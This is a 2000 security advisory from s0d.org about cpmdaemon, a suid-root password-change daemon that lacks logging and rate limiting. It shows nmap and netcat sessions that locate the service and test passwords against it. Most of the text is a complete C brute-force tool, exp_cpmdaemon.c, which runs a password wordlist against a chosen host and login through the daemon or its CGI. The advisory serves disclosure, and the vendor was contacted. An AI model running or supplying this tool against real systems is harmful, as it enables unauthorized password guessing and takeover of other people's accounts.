[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : cpmdaemon password changer script

Title: cpmdaemon password changer script
Released by: s0d.org
Date: 5th September 2000
Printable version: Click here
/*

----------------------------------

cpmdaemon password changer script

----------------------------------



This is a s0d advisory ... Wellcome to our world.



You can find this advisory on www.s0d.org on the advisories section.



Author:

+ Enrique Alfonso Sanchez Montellano (El Nahual)



Shouts:

+ 0x90, Am3ntiA, LoneWolf, int27h, in0m and the rest of tha s0d crew.

+ ADM 

+ l0pht

+ Ag3nt 0nd 

+ Raza Mexicana



Comments:

+ "knock knock Neo?!? ... Doesn't it sound kinda corny?"



URL:

h t t p : / / w w w . s 0 d . o r g



*/



INTRODUCTION

------------



cpmdaemon is a program that runs as a daemon or a cgi (altho daemon is recomended on the README file), allowing the change of passwords, some accounts have been restricted by the program so no unauthorized access can be gained ro priviledged accounts (root, bin, daemon, adm, sql, lp, sync, shutdown, halt, mail, news, uucp, operator, games, gopher, ftp, nobody, xfs,samba, gdm, postgres, squid). Is a fast and very articulate program. Must be suid with owner and group root. It can be called as a cgi, calling the cgi then connecting to the port already defined.



The way to change the password is login:oldpasswd*newpassword#



VULNERABILITIES

---------------



cpmdaemon has ben coded and in the readme file favors the daemon calling of the program so you can also connect and then change the password.



cpmdaemon has no logging at all, is true that only localhost is able to change passwords by default, but being a remote password administration shurely more hosts will be added (trusted hosts), anyway even if localhost is only implemented local users can start de daemon and do abrute force on any other user account. If runned from within the host (/var/lib/apache/cgi-bin/cpmdaemon.cgi on slackware for example) it becomes a true daemon (actually this is recommended by the README file by adding it on the rc.local file). If its called as a cgi then should be suid root wich is not safe at all but at least only lets one try at the time.



There is no defined port for the application but finding it is trivial:



nahual:~/projects/Check/Vulnerable/cpmdaemon# nmap -sS -p 1-9000 localhost



Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

Interesting ports on localhost (127.0.0.1):

Port    State       Protocol  Service

21      open        tcp       ftp

22      open        tcp       ssh

23      open        tcp       telnet

25      open        tcp       smtp

37      open        tcp       time

79      open        tcp       finger

80      open        tcp       http

110     open        tcp       pop-3

111     open        tcp       sunrpc

113     open        tcp       auth

515     open        tcp       printer

712     open        tcp       unknown

2049    open        tcp       nfs

6000    open        tcp       X11

8080    open        tcp       http-proxy



Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds

nahual:~/projects/Check/Vulnerable/cpmdaemon# nc -vv localhost 80

localhost [127.0.0.1] 80 (www) open

GET /cgi-bin/cpmdaemon.cgi HTTP/1.0

 sent 37, rcvd 0

nahual:~/projects/Check/Vulnerable/cpmdaemon# nmap -sS -p 1-9000 localhost



Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

Interesting ports on localhost (127.0.0.1):

Port    State       Protocol  Service

21      open        tcp       ftp

22      open        tcp       ssh

23      open        tcp       telnet

25      open        tcp       smtp

37      open        tcp       time

79      open        tcp       finger

80      open        tcp       http

110     open        tcp       pop-3

111     open        tcp       sunrpc

113     open        tcp       auth

515     open        tcp       printer

712     open        tcp       unknown

2049    open        tcp       nfs

6000    open        tcp       X11

8080    open        tcp       http-proxy

8088    open        tcp       unknown



Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds

nahual:~/projects/Check/Vulnerable/cpmdaemon# nc -vv localhost 8088

localhost [127.0.0.1] 8088 (?) open

CPM Daemon Manager

 sent 0, rcvd 19

nahual:~/projects/Check/Vulnerable/cpmdaemon# 



Anyway we can see how the port 8088 wasn't there before calling the cgi so we can assume that is the port the daemon has been defined to run, also it has a very distinctive banner: "CPM Daemon Manager", same password as before is also allowed so true bruteforcing can be done stealthly:



nahual:~# nc -vv localhost 8088

localhost [127.0.0.1] 8088 (?) open

CPM Daemon Manager

nahual:notmypasswd*notmypasswd#

Password Changed

 sent 32, rcvd 36

nahual:~# telnet localhost

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.







          ###                 ###

           ##                  ##

    ####   ##   ####    ####   ##  ### ###        ### ####   ### ###   ####

   ##      ##      ##  ##      ## ##    ##   ##   ##     ##   ###  ## ##  ##

    ###    ##   #####  ##      ####      ## #### ##   #####   ##      ######

      ##   ##  ##  ##  ##      ## ##      ###  ###   ##  ##   ##      ##

|  ####   ####  ######  ####  ###  ###    ##    ##    ######  ##       #####

|

+------------------------------------------ l  i  n  u  x





nahual login: nahual

Password:

Linux 2.2.13.

No mail.



Any philosophy that can be put in a nutshell belongs there.

                -- Sydney J. Harris



nahual:~$ 



PROOF OF CONCEPT CODE

---------------------



Proof of concept code can be also found in www.s0d.org section of our programs and on advisories:



-- exp_cpmdaemon.c --



/*

  exp_cpmdaemon.c

-----------------------

BY COMPILING THIS PROGRAM YOU HEREBY DECLINE ALL LEGAL AND CIVIL RESPONSABILITY TO THE AUTHOR(S), IF YOU DO NOT COMPLY WITH THIS YOU ARE HEREBY BINDED TO SECURELY ERASE THIS SOURCE.



THIS PROGRAM IS PROOF OF CONCEPT AND FOR EDUCATIONAL PURPOSES ONLY.

-----------------------



Description:



  Program to bruteforce passwords on this little daemon ...



  Compile with:



     gcc -Wall -o exp-cpmdaemon exp-cpmdaemon.c



  or if you want debug gcc:



     gcc -Wall -DDEBUG -o exp-cpmdaemon exp-cpmdaemon.c



Authors:



  El Nahual

  "int main(void) { write(1, "Tha s0d owns me biatch!", 23); return 0; }"



  0x90

  "The louder the music the better the code!"

*/



#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 



#define GOTIT        "Changed"

#define KEEPTRYING   "Invalid"



/* Definicion de colores */

#define VERDE   "\E[32m"

#define BRILLOSO   "\E[1m"

#define NORMAL  "\E[m"

#define ROJO  "\E[31m"

#define CELESTE "\E[36m"

#define AZUL "\E[34m"

#define AMARILLO "\E[33m"

#define MORADO "\E[35m"



void usage(char *nombre) {

  printf("%sUsage: %s%s -[dc] -p  -l  -h  \n", ROJO, AMARILLO,nombre);

  printf("%sd:Daemon mode \n", CELESTE);

  printf("l: login name to bruteforce\n");

  printf("h: host to attack \n");

  printf("c: cgi mode %s\n", NORMAL);

  printf("%s.o0{ Passwords should in a file called passwds.s0d }0o.%s\n", AMARILLO, NORMAL);

}



unsigned long resolver (char *serv) {

  struct sockaddr_in sinn;

  struct hostent *hent;



  hent = gethostbyname (serv);



  bzero ((char *) &sinn, sizeof (sinn));



  memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);



  return sinn.sin_addr.s_addr;

}





int connex(int victim, int port) {

  int sockfd;

  struct sockaddr_in hostaddr;



  if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {

    perror("connex");

    exit(-1);

  }



  hostaddr.sin_port = htons(port);

  hostaddr.sin_addr.s_addr = victim;

  hostaddr.sin_family = AF_INET;



  if((connect(sockfd, (struct sockaddr *) &hostaddr, sizeof(hostaddr))) < 0 ) {

    perror("connex");

    exit(-1);

  }



  return sockfd;

}





/*

  The difference between the daemon and the cgi is the calling of the cgi everytime

*/



int daemon_attack(int victim, char *login, char *passwd, int port) {

  int sockfd, retval, i;

  fd_set rfds;

  struct timeval timer;

  char attack[1024], tmp[255];



  for(i = 0; i < 1024; i++)

    attack[i] = '\0';



  for(i = 0; i < 255; i++)

    tmp[i] = '\0';



  /* Ensambling attack */



  strcat(attack, login);

  strcat(attack, ":");

  strcat(attack, passwd);

  strcat(attack, "*");

  strcat(attack, passwd);

  strcat(attack, "#");

  strcat(attack, "\n");



#ifdef DEBUG

  printf("Trying login %s with password %s \n", login, passwd);

#endif



  sockfd = connex(victim, port);

  FD_ZERO(&rfds);

  FD_SET(sockfd, &rfds);

  timer.tv_sec = 5;

  timer.tv_usec = 0;

  

  retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);



  if(retval) {

    read(sockfd, tmp, sizeof(tmp));

    if(strncmp(tmp, "CPM Daemon Manager", 18) == 0) {

      write(sockfd, attack, strlen(attack));

      read(sockfd, tmp, sizeof(tmp));

      if(strstr(tmp, "Changed") != NULL) {

	printf("\t%s----------------------------------------\n", VERDE);

	printf("\t%sUser %s%s%s has passwd %s%s%s %s\n", VERDE, CELESTE, login, VERDE, CELESTE, passwd, VERDE, NORMAL);

	printf("\t%sTha s0d crew owns you biatch!!!!!!%s\n", VERDE, NORMAL);

	printf("\t%s----------------------------------------%s\n", VERDE, NORMAL);

	return 0;

      }

      else {



#ifdef DEBUG	

	printf("%s\n", tmp);

#endif

	return 1;

      }

    }

    else {

      printf("Doh! this is not the CPM Daemon manager!\n");

      exit(0);

    }

  }

  else {

    printf("Timeout! \n");

    exit(0);

  }



  return 0;

}



int cgi_attack(int victim, char *login, char *passwd, int port) {

  char call_cgi[255] = "GET /cgi-bin/cpmdaemon.cgi HTTP/1.0 \r\n\r\n";

  int sockfd, retval, i;

  fd_set rfds;

  struct timeval timer;

  char attack[1024], tmp[255];



  for(i = 0; i < 1024; i++)

    attack[i] = '\0';



  for(i = 0; i < 255; i++)

    tmp[i] = '\0';



  /* Ensambling attack */



  strcat(attack, login);

  strcat(attack, ":");

  strcat(attack, passwd);

  strcat(attack, "*");

  strcat(attack, passwd);

  strcat(attack, "#");

  strcat(attack, "\n");



#ifdef DEBUG

  printf("attack's value is: %s \n", attack);

#endif



  /* calling the cgi */



  sockfd = connex(victim, 80);

  FD_ZERO(&rfds);

  FD_SET(sockfd, &rfds);

  timer.tv_sec = 5;

  timer.tv_usec = 0;



  retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);



  if(retval) {

#ifdef DEBUG

    printf("calling the cgi with %s", call_cgi);

#endif

    write(sockfd, call_cgi, strlen(call_cgi));

  }

  else {

    printf("TIMEOUT!\n");

    exit(-1);

  }



  close(sockfd);



  /* doing the attack on the pseudodaemon */



#ifdef DEBUG

  printf("Connecting with login %s and passwd %s \n", login, passwd);

#endif



  sockfd = connex(victim, port);

  FD_ZERO(&rfds);

  FD_SET(sockfd, &rfds);

  timer.tv_sec = 5;

  timer.tv_usec = 0;

  

  retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);



  if(retval) {

    read(sockfd, tmp, sizeof(tmp));

    if(strncmp(tmp, "CPM Daemon Manager", 18) == 0) {

      write(sockfd, attack, strlen(attack));

      read(sockfd, tmp, sizeof(tmp));

      if(strstr(tmp, "Changed") != NULL) {

	printf("%sUser %s has passwd %s %s\n", CELESTE, login, passwd, NORMAL);

	return 0;

      }

      else {

#ifdef DEBUG	

	printf("%s\n", tmp);

#endif

	return 1;

      }

    }

    else {

      printf("Doh! this is not the CPM Daemon manager!\n");

      exit(0);

    }

  }

  else {

    printf("Timeout! \n");

    exit(0);

  }



  return 0;

}



void header(void) {

  printf("%s\t\t\texp_cpmdaemon\n", ROJO);

  printf("\t----------------------------------------------\n");

  printf("%s\t     by El Nahual and 0x90 of tha s0d crew\n", AMARILLO);

  printf("\t\ts0d crew owns you biatch!\n");

  printf("%s\t----------------------------------------------%s\n\n", ROJO, NORMAL);

}



int main(int argc, char **argv) {

  char ch;

  int counter = 1, port, i;

  char *login, *server, tmp[255];

  char daemon = 0;   //Daemon enabled by default

  FILE *inFile;



  if(argc != 8) {

    usage(argv[0]);

    exit(0);

  }





  for(i = 0; i < 255; i++)

    tmp[255] = '\0';



  while((ch = getopt(argc, argv, "h:,l:,dc,p:")) != EOF) {

    counter++;

    switch(ch) {

    case 'h':

      server = argv[counter + 1];

      break;

    case 'l':

      login = argv[counter];

      break;

    case 'd':

      daemon = 0;

      break;

    case 'c':

      daemon = 1;

      break;

    case 'p':

      port = atoi(argv[counter + 2]);

      break;

    default:

      usage(argv[0]);

      exit(0);

      break;

    }

  }



  header();



  if((inFile = fopen("passwds.s0d", "r")) == NULL) {

    perror("exp_cpmdaemon.c");

    exit(-1);

  }



  (void)fseek(inFile, 0, SEEK_SET);



  while(fgets(tmp, 255, inFile) != NULL) {



    if(tmp[strlen(tmp) - 1] == '\n')

      tmp[strlen(tmp) - 1] = '\0';



    if(daemon == 0) {

      daemon_attack(resolver(server), login, tmp, port);

    }

    else {

      cgi_attack(resolver(server), login, tmp, port);

    }



  }

  return 0;

}



-- exp_cpmdaemon.c --



AUTHOR

------



Richard P. Thomas (cyberlot@cyberlot.net) has been contacted. And kudos for him for being cool on fixes and taking all we said on account. =)



THANK YOU

---------



+ My Wife Blanca for putting with my computer addiction. };-P

+ All people who put with my shit and bad coding.

+ All great persons who have answered my questions, even the stupid ones.

+ Am3ntiA, damn bro too bad I had to move.








(C) 1999-2000 All rights reserved.